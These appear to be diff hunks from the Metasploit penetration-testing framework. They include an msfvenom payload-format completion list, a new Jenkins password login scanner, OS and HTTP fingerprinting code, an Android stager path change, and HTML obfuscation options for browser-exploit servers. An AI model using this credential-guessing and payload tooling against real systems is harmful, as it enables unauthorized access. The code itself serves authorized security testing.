{-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
|
||||
{-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
|
||||
{-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
|
||||
"--help-formats[List available formats]" \
|
||||
{-h,--help}"[Help banner]" \
|
||||
{-i,--iterations}"[The number of times to encode the payload]:iterations" \
|
||||
{-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
|
||||
{-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
|
||||
{-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
|
||||
{-o,--options}"[List the payload's standard options]" \
|
||||
"--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
|
||||
{-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
|
||||
{-s,--space}"[The maximum size of the resulting payload]:length" \
|
||||
{-x,--template}"[Specify an alternate executable template]:template file:_files"
|
|
@ -4,6 +4,14 @@
|
|||
|
||||
require 'fileutils'
|
||||
|
||||
#
|
||||
# Metasploit gem engines
|
||||
#
|
||||
|
||||
require 'metasploit/model/engine'
|
||||
require 'metasploit/concern/engine'
|
||||
Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines
|
||||
|
||||
# `Rails::Engine` behavior common to both {Metasploit::Framework::Application} and {Metasploit::Framework::Engine}.
|
||||
module Metasploit::Framework::CommonEngine
|
||||
extend ActiveSupport::Concern
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
require 'metasploit/framework/login_scanner/http'
|
||||
|
||||
module Metasploit
|
||||
module Framework
|
||||
module LoginScanner
|
||||
|
||||
# Jenkins login scanner
|
||||
class Jenkins < HTTP
|
||||
|
||||
# Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
|
||||
CAN_GET_SESSION = true
|
||||
DEFAULT_PORT = 8080
|
||||
PRIVATE_TYPES = [ :password ]
|
||||
|
||||
# (see Base#set_sane_defaults)
|
||||
def set_sane_defaults
|
||||
self.uri = "/j_acegi_security_check" if self.uri.nil?
|
||||
self.method = "POST" if self.method.nil?
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def attempt_login(credential)
|
||||
result_opts = {
|
||||
credential: credential,
|
||||
host: host,
|
||||
port: port,
|
||||
protocol: 'tcp'
|
||||
}
|
||||
if ssl
|
||||
result_opts[:service_name] = 'https'
|
||||
else
|
||||
result_opts[:service_name] = 'http'
|
||||
end
|
||||
begin
|
||||
cli = Rex::Proto::Http::Client.new(host, port, {}, ssl, ssl_version)
|
||||
cli.connect
|
||||
req = cli.request_cgi({
|
||||
'method'=>'POST',
|
||||
'uri'=>'/j_acegi_security_check',
|
||||
'vars_post'=> {
|
||||
'j_username' => credential.public,
|
||||
'j_password'=>credential.private
|
||||
}
|
||||
})
|
||||
res = cli.send_recv(req)
|
||||
if res && !res.headers['location'].include?('loginError')
|
||||
result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
|
||||
else
|
||||
result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
|
||||
end
|
||||
rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
|
||||
result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
|
||||
end
|
||||
Result.new(result_opts)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -72,6 +72,23 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
# Tries to require gems necessary for using a database with the framework.
|
||||
#
|
||||
# @example
|
||||
# Metasploit::Framework::Require.optionally_require_metasploit_db_gems
|
||||
#
|
||||
# @return [void]
|
||||
def self.optionally_require_metasploit_db_gem_engines
|
||||
optionally(
|
||||
'metasploit/credential/engine',
|
||||
'metasploit-credential not in the bundle',
|
||||
)
|
||||
optionally(
|
||||
'metasploit_data_models/engine',
|
||||
'metaspoit_data_models not in the bundle'
|
||||
)
|
||||
end
|
||||
|
||||
#
|
||||
# Instance Methods
|
||||
#
|
||||
|
|
|
@ -31,7 +31,7 @@ class ReadableText
|
|||
when MODULE_AUX
|
||||
return dump_auxiliary_module(mod, indent)
|
||||
when MODULE_POST
|
||||
return dump_basic_module(mod, indent)
|
||||
return dump_post_module(mod, indent)
|
||||
else
|
||||
return dump_generic_module(mod, indent)
|
||||
end
|
||||
|
@ -84,14 +84,14 @@ class ReadableText
|
|||
tbl.to_s + "\n"
|
||||
end
|
||||
|
||||
# Dumps an auxiliary's actions
|
||||
# Dumps a module's actions
|
||||
#
|
||||
# @param mod [Msf::Auxiliary] the auxiliary module.
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param indent [String] the indentation to use (only the length
|
||||
# matters)
|
||||
# @param h [String] the string to display as the table heading.
|
||||
# @return [String] the string form of the table.
|
||||
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
|
||||
def self.dump_module_actions(mod, indent = '', h = nil)
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Header' => h,
|
||||
|
@ -108,6 +108,28 @@ class ReadableText
|
|||
tbl.to_s + "\n"
|
||||
end
|
||||
|
||||
# Dumps the module's selected action
|
||||
#
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param indent [String] the indentation to use (only the length
|
||||
# matters)
|
||||
# @param h [String] the string to display as the table heading.
|
||||
# @return [String] the string form of the table.
|
||||
def self.dump_module_action(mod, indent = '', h = nil)
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Header' => h,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Description',
|
||||
])
|
||||
|
||||
tbl << [ mod.action.name || 'All', mod.action.description || '' ]
|
||||
|
||||
tbl.to_s + "\n"
|
||||
end
|
||||
|
||||
# Dumps the table of payloads that are compatible with the supplied
|
||||
# exploit.
|
||||
#
|
||||
|
@ -210,6 +232,57 @@ class ReadableText
|
|||
}
|
||||
output << "\n"
|
||||
|
||||
# Actions
|
||||
if mod.action
|
||||
output << "Available actions:\n"
|
||||
output << dump_module_actions(mod, indent)
|
||||
end
|
||||
|
||||
# Options
|
||||
if (mod.options.has_options?)
|
||||
output << "Basic options:\n"
|
||||
output << dump_options(mod, indent)
|
||||
output << "\n"
|
||||
end
|
||||
|
||||
# Description
|
||||
output << "Description:\n"
|
||||
output << word_wrap(Rex::Text.compress(mod.description))
|
||||
output << "\n"
|
||||
|
||||
# References
|
||||
output << dump_references(mod, indent)
|
||||
|
||||
return output
|
||||
end
|
||||
|
||||
# Dumps information about a post module.
|
||||
#
|
||||
# @param mod [Msf::Post] the post module.
|
||||
# @param indent [String] the indentation to use.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_post_module(mod, indent = '')
|
||||
output = "\n"
|
||||
output << " Name: #{mod.name}\n"
|
||||
output << " Module: #{mod.fullname}\n"
|
||||
output << " Platform: #{mod.platform_to_s}\n"
|
||||
output << " Arch: #{mod.arch_to_s}\n"
|
||||
output << " Rank: #{mod.rank_to_s.capitalize}\n"
|
||||
output << "\n"
|
||||
|
||||
# Authors
|
||||
output << "Provided by:\n"
|
||||
mod.each_author { |author|
|
||||
output << indent + author.to_s + "\n"
|
||||
}
|
||||
output << "\n"
|
||||
|
||||
# Actions
|
||||
if mod.action
|
||||
output << "Available actions:\n"
|
||||
output << dump_module_actions(mod, indent)
|
||||
end
|
||||
|
||||
# Options
|
||||
if (mod.options.has_options?)
|
||||
output << "Basic options:\n"
|
||||
|
|
|
@ -347,7 +347,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
|||
self.db_record.save!
|
||||
end
|
||||
|
||||
framework.db.update_host_via_sysinfo(:host => self, :workspace => wspace, :info => sysinfo)
|
||||
# XXX: This is obsolete given the Mdm::Host.normalize_os() support for host.os.session_fingerprint
|
||||
# framework.db.update_host_via_sysinfo(:host => self, :workspace => wspace, :info => sysinfo)
|
||||
|
||||
if nhost
|
||||
framework.db.report_note({
|
||||
|
|
|
@ -58,14 +58,17 @@ module HttpClients
|
|||
|
||||
UNKNOWN = "Unknown"
|
||||
end
|
||||
|
||||
module OperatingSystems
|
||||
LINUX = "Linux"
|
||||
MAC_OSX = "Mac OS X"
|
||||
WINDOWS = "Microsoft Windows"
|
||||
WINDOWS = "Windows"
|
||||
FREEBSD = "FreeBSD"
|
||||
NETBSD = "NetBSD"
|
||||
OPENBSD = "OpenBSD"
|
||||
VMWARE = "VMware"
|
||||
ANDROID = "Android"
|
||||
APPLE_IOS = "iOS"
|
||||
|
||||
module VmwareVersions
|
||||
ESX = "ESX"
|
||||
|
@ -73,17 +76,48 @@ module OperatingSystems
|
|||
end
|
||||
|
||||
module WindowsVersions
|
||||
NINE5 = "95"
|
||||
NINE8 = "98"
|
||||
NT = "NT"
|
||||
XP = "XP"
|
||||
TWOK = "2000"
|
||||
TWOK3 = "2003"
|
||||
VISTA = "Vista"
|
||||
TWOK8 = "2008"
|
||||
TWOK12 = "2012"
|
||||
SEVEN = "7"
|
||||
EIGHT = "8"
|
||||
EIGHTONE = "8.1"
|
||||
end
|
||||
|
||||
UNKNOWN = "Unknown"
|
||||
|
||||
module Match
|
||||
WINDOWS = /^(?:Microsoft )?Windows/
|
||||
WINDOWS_95 = /^(?:Microsoft )?Windows 95/
|
||||
WINDOWS_98 = /^(?:Microsoft )?Windows 98/
|
||||
WINDOWS_ME = /^(?:Microsoft )?Windows ME/
|
||||
WINDOWS_NT3 = /^(?:Microsoft )?Windows NT 3/
|
||||
WINDOWS_NT4 = /^(?:Microsoft )?Windows NT 4/
|
||||
WINDOWS_2000 = /^(?:Microsoft )?Windows 2000/
|
||||
WINDOWS_XP = /^(?:Microsoft )?Windows XP/
|
||||
WINDOWS_2003 = /^(?:Microsoft )?Windows 2003/
|
||||
WINDOWS_VISTA = /^(?:Microsoft )?Windows Vista/
|
||||
WINDOWS_2008 = /^(?:Microsoft )?Windows 2008/
|
||||
WINDOWS_7 = /^(?:Microsoft )?Windows 7/
|
||||
WINDOWS_2012 = /^(?:Microsoft )?Windows 2012/
|
||||
WINDOWS_8 = /^(?:Microsoft )?Windows 8/
|
||||
WINDOWS_81 = /^(?:Microsoft )?Windows 8\.1/
|
||||
|
||||
LINUX = /^Linux/i
|
||||
MAC_OSX = /^(?:Apple )?Mac OS X/
|
||||
FREEBSD = /^FreeBSD/
|
||||
NETBSD = /^NetBSD/
|
||||
OPENBSD = /^OpenBSD/
|
||||
VMWARE = /^VMware/
|
||||
ANDROID = /^(?:Google )?Android/
|
||||
APPLE_IOS = /^(?:Apple )?iOS/
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -105,4 +139,3 @@ LICENSES =
|
|||
ARTISTIC_LICENSE,
|
||||
UNKNOWN_LICENSE
|
||||
]
|
||||
|
||||
|
|
|
@ -315,8 +315,8 @@ class DBManager
|
|||
#
|
||||
# The opts parameter can contain:
|
||||
# +:state+:: -- one of the Msf::HostState constants
|
||||
# +:os_name+:: -- one of the Msf::OperatingSystems constants
|
||||
# +:os_flavor+:: -- something like "XP" or "Gentoo"
|
||||
# +:os_name+:: -- something like "Windows", "Linux", or "Mac OS X"
|
||||
# +:os_flavor+:: -- something like "Enterprise", "Pro", or "Home"
|
||||
# +:os_sp+:: -- something like "SP2"
|
||||
# +:os_lang+:: -- something like "English", "French", or "en-US"
|
||||
# +:arch+:: -- one of the ARCH_* constants
|
||||
|
@ -463,14 +463,11 @@ class DBManager
|
|||
end
|
||||
|
||||
if info['OS'] =~ /^Windows\s*([^\(]+)\(([^\)]+)\)/i
|
||||
res[:os_name] = "Microsoft Windows"
|
||||
res[:os_flavor] = $1.strip
|
||||
res[:os_name] = "Windows #{$1.strip}"
|
||||
build = $2.strip
|
||||
|
||||
if build =~ /Service Pack (\d+)/
|
||||
res[:os_sp] = "SP" + $1
|
||||
else
|
||||
res[:os_sp] = "SP0"
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -3542,7 +3539,18 @@ class DBManager
|
|||
:task => args[:task]
|
||||
}
|
||||
|
||||
conf[:os_name] = os if os
|
||||
|
||||
if os
|
||||
report_note(
|
||||
:workspace => wspace,
|
||||
:task => args[:task],
|
||||
:host => ip,
|
||||
:type => 'host.os.spiceworks_fingerprint',
|
||||
:data => {
|
||||
:os => os.to_s.strip
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
info = []
|
||||
info << "Serial Number: #{serialno}" unless (serialno.blank? or serialno == name)
|
||||
|
|
|
@ -89,8 +89,8 @@ module Exploit::Android
|
|||
|
||||
# The NDK stager is used to launch a hidden APK
|
||||
def ndkstager(stagename, arch)
|
||||
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
|
||||
data = File.read(localfile, :mode => 'rb')
|
||||
path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
|
||||
data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
|
||||
data.gsub!('PLOAD', stagename)
|
||||
end
|
||||
|
||||
|
|
|
@ -439,41 +439,86 @@ module Exploit::Remote::HttpClient
|
|||
datastore['Proxies']
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Lookup HTTP fingerprints from the database that match the current
|
||||
# destination host and port. This method falls back to using the old
|
||||
# service.info field to represent the HTTP Server header.
|
||||
#
|
||||
# @option opts [String] :uri ('/') An HTTP URI to request in order to generate
|
||||
# a fingerprint
|
||||
# @option opts [String] :method ('GET') An HTTP method to use in the fingerprint
|
||||
# request
|
||||
def lookup_http_fingerprints(opts={})
|
||||
uri = opts[:uri] || '/'
|
||||
method = opts[:method] || 'GET'
|
||||
fprints = []
|
||||
|
||||
return fprints unless framework.db.active
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = datastore['WORKSPACE'] ?
|
||||
framework.db.find_workspace(datastore['WORKSPACE']) : framework.db.workspace
|
||||
|
||||
service = framework.db.get_service(wspace, rhost, 'tcp', rport)
|
||||
return fprints unless service
|
||||
|
||||
# Order by note_id descending so the first value is the most recent
|
||||
service.notes.where(:ntype => 'http.fingerprint').order("notes.id DESC").each do |n|
|
||||
next unless n.data && n.data.kind_of?(::Hash)
|
||||
next unless n.data[:uri] == uri && n.data[:method] == method
|
||||
# Append additional fingerprints to the results as found
|
||||
fprints.unshift n.data.dup
|
||||
end
|
||||
}
|
||||
|
||||
fprints
|
||||
end
|
||||
|
||||
#
|
||||
# Record various things about an HTTP server that we can glean from the
|
||||
# response to a single request. If this method is passed a response, it
|
||||
# will use it directly, otherwise it will check the database for a previous
|
||||
# fingerprint. Failing that, it will make a request for /.
|
||||
#
|
||||
# Options:
|
||||
# :response an Http::Packet as returned from any of the send_* methods
|
||||
# Other options are passed directly to {#connect} if :response is not given
|
||||
#
|
||||
# Other options are passed directly to +connect+ if :response is not given
|
||||
# @option opts [Rex::Proto::Http::Packet] :response The return value from any
|
||||
# of the send_* methods
|
||||
# @option opts [String] :uri ('/') An HTTP URI to request in order to generate
|
||||
# a fingerprint
|
||||
# @option opts [String] :method ('GET') An HTTP method to use in the fingerprint
|
||||
# request
|
||||
# @option opts [Boolean] :full (false) Request the full HTTP fingerprint, not
|
||||
# just the signature
|
||||
#
|
||||
# @return [String]
|
||||
def http_fingerprint(opts={})
|
||||
res = nil
|
||||
uri = opts[:uri] || '/'
|
||||
method = opts[:method] || 'GET'
|
||||
|
||||
if (opts[:response])
|
||||
# Short-circuit the fingerprint lookup and HTTP request if a response has
|
||||
# already been provided by the caller.
|
||||
if opts[:response]
|
||||
res = opts[:response]
|
||||
else
|
||||
# Check to see if we already have a fingerprint before going out to
|
||||
# the network.
|
||||
if (framework.db.active)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = framework.db.workspace
|
||||
if datastore['WORKSPACE']
|
||||
wspace = framework.db.find_workspace(datastore['WORKSPACE'])
|
||||
end
|
||||
fprints = lookup_http_fingerprints(opts)
|
||||
|
||||
s = framework.db.get_service(wspace, rhost, 'tcp', rport)
|
||||
if (s and s.info)
|
||||
return s.info
|
||||
end
|
||||
}
|
||||
if fprints.length > 0
|
||||
|
||||
# Grab the most recent fingerprint available for this service, uri, and method
|
||||
fprint = fprints.last
|
||||
|
||||
# Return the full HTTP fingerprint if requested by the caller
|
||||
return fprint if opts[:full]
|
||||
|
||||
# Otherwise just return the signature string for compatibility
|
||||
return fprint[:signature]
|
||||
end
|
||||
|
||||
# Go ahead and send a request to the target for fingerprinting
|
||||
connect(opts)
|
||||
uri = opts[:uri] || '/'
|
||||
method = opts[:method] || 'GET'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri,
|
||||
|
@ -481,11 +526,13 @@ module Exploit::Remote::HttpClient
|
|||
})
|
||||
end
|
||||
|
||||
# Bail if we don't have anything to fingerprint
|
||||
# Bail if the request did not receive a readable response
|
||||
return if not res
|
||||
|
||||
# From here to the end simply does some pre-canned combining and custom matches
|
||||
# to build a human-readable string to store in service.info
|
||||
# This section handles a few simple cases of pattern matching and service
|
||||
# classification. This logic should be deprecated in favor of Recog-based
|
||||
# fingerprint databases, but has been left in place for backward compat.
|
||||
|
||||
extras = []
|
||||
|
||||
if res.headers['Set-Cookie'] =~ /^vmware_soap_session/
|
||||
|
@ -537,6 +584,11 @@ module Exploit::Remote::HttpClient
|
|||
end
|
||||
end
|
||||
|
||||
#
|
||||
# This HTTP response code tracking is used by a few modules and the MSP logic
|
||||
# to identify and bruteforce certain types of servers. In the long run we
|
||||
# should deprecate this and use the http.fingerprint fields instead.
|
||||
#
|
||||
case res.code
|
||||
when 301,302
|
||||
extras << "#{res.code}-#{res.headers['Location']}"
|
||||
|
@ -548,12 +600,51 @@ module Exploit::Remote::HttpClient
|
|||
extras << "#{res.code}-#{res.message}"
|
||||
end
|
||||
|
||||
info = "#{res.headers['Server']}"
|
||||
# Build a human-readable string to store in service.info and http.fingerprint[:signature]
|
||||
info = res.headers['Server'].to_s.dup
|
||||
info << " ( #{extras.join(", ")} )" if extras.length > 0
|
||||
|
||||
# Create a new fingerprint structure to track this response
|
||||
fprint = {
|
||||
:uri => uri, :method => method,
|
||||
:code => res.code.to_s, :message => res.message.to_s,
|
||||
:signature => info
|
||||
}
|
||||
|
||||
res.headers.each_pair do |k,v|
|
||||
hname = k.to_s.downcase.gsub('-', '_').gsub(/[^a-z0-9_]+/, '')
|
||||
next unless hname.length > 0
|
||||
|
||||
# Set-Cookie > :header_set_cookie => JSESSIONID=AAASD23423452
|
||||
# Server > :header_server => Apache/1.3.37
|
||||
# WWW-Authenticate > :header_www_authenticate => basic realm='www'
|
||||
|
||||
fprint["header_#{hname}".intern] = v
|
||||
end
|
||||
|
||||
# Store the first 64k of the HTTP body as well
|
||||
fprint[:content] = res.body.to_s[0,65535]
|
||||
|
||||
# Report a new http.fingerprint note
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:ntype => 'http.fingerprint',
|
||||
:data => fprint,
|
||||
# Limit reporting to one stored note per host/service combination
|
||||
:update => :unique
|
||||
)
|
||||
|
||||
# Report here even if info is empty since the fact that we didn't
|
||||
# return early means we at least got a connection and the service is up
|
||||
report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
|
||||
info
|
||||
|
||||
# Return the full HTTP fingerprint if requested by the caller
|
||||
return fprint if opts[:full]
|
||||
|
||||
# Otherwise just return the signature string for compatibility
|
||||
fprint[:signature]
|
||||
end
|
||||
|
||||
def make_cnonce
|
||||
|
|
|
@ -258,18 +258,19 @@ module Exploit::Remote::HttpServer
|
|||
# Report#report_client, and Msf::DBManager#report_host namely:
|
||||
# +:ua_name+:: a brief identifier for the client, e.g. "Firefox"
|
||||
# +:ua_ver+:: the version number of the client, e.g. "3.0.11"
|
||||
# +:os_name+:: one of the Msf::OperatingSystems constants
|
||||
# +:os_flavor+:: something like "XP" or "Gentoo"
|
||||
# +:os_name+:: something like "Windows XP", "Windows 7", or "Linux"
|
||||
# +:os_flavor+:: something like "Enterprise", "Pro", or "Home"
|
||||
# +:os_lang+:: something like "English", "French", or "en-US"
|
||||
# +:arch+:: one of the ARCH_* constants
|
||||
#
|
||||
# Unknown values may be nil.
|
||||
#
|
||||
def fingerprint_user_agent(ua_str)
|
||||
|
||||
fp = { :ua_string => ua_str }
|
||||
|
||||
# always check for IE last because everybody tries to
|
||||
# look like IE
|
||||
# Guess the browser type based on the user agent
|
||||
# Check for IE last since its often impersonated
|
||||
case (ua_str.downcase)
|
||||
# Chrome tries to look like Safari, so check it first
|
||||
when /chrome\/(\d+(:?\.\d+)*)/
|
||||
|
@ -292,58 +293,70 @@ module Exploit::Remote::HttpServer
|
|||
else
|
||||
fp[:ua_name] = HttpClients::UNKNOWN
|
||||
end
|
||||
|
||||
# Guess the language
|
||||
case (ua_str.downcase)
|
||||
when /(en-us|en-gb)/
|
||||
fp[:os_lang] = $1
|
||||
end
|
||||
|
||||
# Guess the general OS type
|
||||
case (ua_str.downcase)
|
||||
when /windows/
|
||||
when /windows|win32/
|
||||
fp[:os_name] = OperatingSystems::WINDOWS
|
||||
fp[:arch] = ARCH_X86
|
||||
when /linux/
|
||||
fp[:os_name] = OperatingSystems::LINUX
|
||||
when /iphone/
|
||||
fp[:os_name] = OperatingSystems::MAC_OSX
|
||||
when /iphone|ipad/
|
||||
fp[:os_name] = OperatingSystems::APPLE_IOS
|
||||
fp[:arch] = 'armle'
|
||||
when /mac os x/
|
||||
fp[:os_name] = OperatingSystems::MAC_OSX
|
||||
else
|
||||
fp[:os_name] = OperatingSystems::UNKNOWN
|
||||
end
|
||||
|
||||
# Determine the specific OS variant
|
||||
|
||||
# Note that we assume windows variants are the
|
||||
# client version and mismatch server editions.
|
||||
|
||||
case (ua_str.downcase)
|
||||
when /windows 95/
|
||||
fp[:os_flavor] = '95'
|
||||
fp[:os_name] = 'Windows 95'
|
||||
when /windows 98/
|
||||
fp[:os_flavor] = '98'
|
||||
fp[:os_name] = 'Windows 98'
|
||||
when /windows nt 4/
|
||||
fp[:os_flavor] = 'NT'
|
||||
fp[:os_name] = 'Windows NT'
|
||||
when /windows nt 5.0/
|
||||
fp[:os_flavor] = '2000'
|
||||
fp[:os_name] = 'Windows 2000'
|
||||
when /windows nt 5.1/
|
||||
fp[:os_flavor] = 'XP'
|
||||
fp[:os_name] = 'Windows XP'
|
||||
when /windows nt 5.2/
|
||||
fp[:os_flavor] = '2003'
|
||||
fp[:os_name] = 'Windows 2003'
|
||||
when /windows nt 6.0/
|
||||
fp[:os_flavor] = 'Vista'
|
||||
fp[:os_name] = 'Windows Vista'
|
||||
when /windows nt 6.1/
|
||||
fp[:os_flavor] = '7'
|
||||
fp[:os_name] = 'Windows 7'
|
||||
when /windows nt 6.2/
|
||||
fp[:os_flavor] = '8'
|
||||
fp[:os_name] = 'Windows 8'
|
||||
when /windows nt 6.3/
|
||||
fp[:os_name] = 'Windows 8.1'
|
||||
when /gentoo/
|
||||
fp[:os_flavor] = 'Gentoo'
|
||||
fp[:os_vendor] = 'Gentoo'
|
||||
when /debian/
|
||||
fp[:os_flavor] = 'Debian'
|
||||
fp[:os_vendor] = 'Debian'
|
||||
when /ubuntu/
|
||||
fp[:os_flavor] = 'Ubuntu'
|
||||
fp[:os_vendor] = 'Ubuntu'
|
||||
when /fedora/
|
||||
fp[:os_flavor] = 'Fedora'
|
||||
fp[:os_vendor] = 'Fedora'
|
||||
when /red hat|rhel/
|
||||
fp[:os_flavor] = 'RHEL'
|
||||
fp[:os_vendor] = 'RHEL'
|
||||
when /android/
|
||||
fp[:os_flavor] = 'Android'
|
||||
else
|
||||
fp[:os_flavor] = ''
|
||||
fp[:os_name] = OperatingSystems::ANDROID
|
||||
end
|
||||
|
||||
# Guess the architecture
|
||||
case (ua_str.downcase)
|
||||
when /ppc/
|
||||
fp[:arch] = ARCH_PPC
|
||||
|
@ -676,6 +689,16 @@ module Exploit::Remote::HttpServer::HTML
|
|||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
UTF_NONE = 'none'
|
||||
UTF_7 = 'utf-7'
|
||||
UTF_7_ALL = 'utf-7-all'
|
||||
UTF_8 = 'utf-8'
|
||||
UTF_16_LE = 'utf-16le'
|
||||
UTF_16_BE = 'utf-16be'
|
||||
UTF_16_BE_MARKER = 'utf-16be-marker'
|
||||
UTF_32_LE = 'utf-32le'
|
||||
UTF_32_BE = 'utf-32be'
|
||||
|
||||
protected
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -687,7 +710,7 @@ protected
|
|||
# most browsers. as such, they are not added by default. The
|
||||
# mixin supports encoding using them, however they are not
|
||||
# listed in the Option.
|
||||
OptEnum.new('HTML::unicode', [false, 'Enable HTTP obfuscation via unicode', 'none', ['none', 'utf-16le', 'utf-16be', 'utf-16be-marker', 'utf-32le', 'utf-32be']]),
|
||||
OptEnum.new('HTML::unicode', [false, 'Enable HTTP obfuscation via unicode', UTF_NONE, [UTF_NONE, UTF_16_LE, UTF_16_BE, UTF_16_BE_MARKER, UTF_32_LE, UTF_32_BE]]),
|
||||
OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
|
||||
OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]),
|
||||
], Exploit::Remote::HttpServer::HTML)
|
||||
|
@ -881,19 +904,19 @@ protected
|
|||
}
|
||||
end
|
||||
|
||||
if ['utf-16le','utf-16be','utf32-le','utf32-be','utf-7','utf-8'].include?(datastore['HTML::unicode'])
|
||||
if [UTF_16_LE, UTF_16_BE, UTF_32_LE, UTF_32_BE, UTF_7, UTF_8].include?(datastore['HTML::unicode'])
|
||||
headers['Content-Type'] = 'text/html; charset= ' + datastore['HTML::unicode']
|
||||
body = Rex::Text.to_unicode(body, datastore['HTML::unicode'])
|
||||
else
|
||||
# special cases
|
||||
case datastore['HTML::unicode']
|
||||
when 'utf-16be-marker'
|
||||
when UTF_16_BE_MARKER
|
||||
headers['Content-Type'] = 'text/html'
|
||||
body = "\xFE\xFF" + Rex::Text.to_unicode(body, 'utf-16be')
|
||||
when 'utf-7-all'
|
||||
headers['Content-Type'] = 'text/html; charset=utf-7'
|
||||
body = Rex::Text.to_unicode(body, 'utf-7', 'all')
|
||||
when 'none'
|
||||
body = "\xFE\xFF" + Rex::Text.to_unicode(body, UTF_16_BE)
|
||||
when UTF_7_ALL
|
||||
headers['Content-Type'] = "text/html; charset=#{UTF_7}"
|
||||
body = Rex::Text.to_unicode(body, UTF_7, 'all')
|
||||
when UTF_NONE
|
||||
# do nothing
|
||||
else
|
||||
raise RuntimeError, 'Invalid unicode. how did you get here?'
|
||||
|
|
|
@ -3,6 +3,7 @@
|
|||
require 'erb'
|
||||
require 'cgi'
|
||||
require 'date'
|
||||
require 'set'
|
||||
require 'rex/exploitation/js'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
|
@ -23,43 +24,46 @@ module Msf
|
|||
# this must be static between runs, otherwise the older cookies will be ignored
|
||||
DEFAULT_COOKIE_NAME = '__ua'
|
||||
|
||||
PROXY_REQUEST_HEADER_SET = Set.new(
|
||||
%w{
|
||||
CLIENT_IP
|
||||
FORWARDED
|
||||
FORWARDED_FOR
|
||||
FORWARDED_FOR_IP
|
||||
HTTP_CLIENT_IP
|
||||
HTTP_FORWARDED
|
||||
HTTP_FORWARDED_FOR
|
||||
HTTP_FORWARDED_FOR_IP
|
||||
HTTP_PROXY_CONNECTION
|
||||
HTTP_VIA
|
||||
HTTP_X_FORWARDED
|
||||
HTTP_X_FORWARDED_FOR
|
||||
VIA
|
||||
X_FORWARDED
|
||||
X_FORWARDED_FOR
|
||||
})
|
||||
PROXY_REQUEST_HEADER_SET = Set.new(%w{
|
||||
CLIENT_IP
|
||||
FORWARDED
|
||||
FORWARDED_FOR
|
||||
FORWARDED_FOR_IP
|
||||
HTTP_CLIENT_IP
|
||||
HTTP_FORWARDED
|
||||
HTTP_FORWARDED_FOR
|
||||
HTTP_FORWARDED_FOR_IP
|
||||
HTTP_PROXY_CONNECTION
|
||||
HTTP_VIA
|
||||
HTTP_X_FORWARDED
|
||||
HTTP_X_FORWARDED_FOR
|
||||
VIA
|
||||
X_FORWARDED
|
||||
X_FORWARDED_FOR
|
||||
})
|
||||
|
||||
# Requirements a browser module can define in either BrowserRequirements or in targets
|
||||
REQUIREMENT_KEY_SET = {
|
||||
:source => 'source', # Either 'script' or 'headers'
|
||||
:ua_name => 'ua_name', # Example: MSIE
|
||||
:ua_ver => 'ua_ver', # Example: 8.0, 9.0
|
||||
:os_name => 'os_name', # Example: Microsoft Windows
|
||||
:os_flavor => 'os_flavor', # Example: XP, 7
|
||||
:language => 'language', # Example: en-us
|
||||
:arch => 'arch', # Example: x86
|
||||
:proxy => 'proxy', # 'true' or 'false'
|
||||
:silverlight => 'silverlight', # 'true' or 'false'
|
||||
:office => 'office', # Example: "2007", "2010"
|
||||
:java => 'java', # Example: 1.6, 1.6.0.0
|
||||
:clsid => 'clsid', # ActiveX clsid. Also requires the :method key
|
||||
:method => 'method', # ActiveX method. Also requires the :clsid key
|
||||
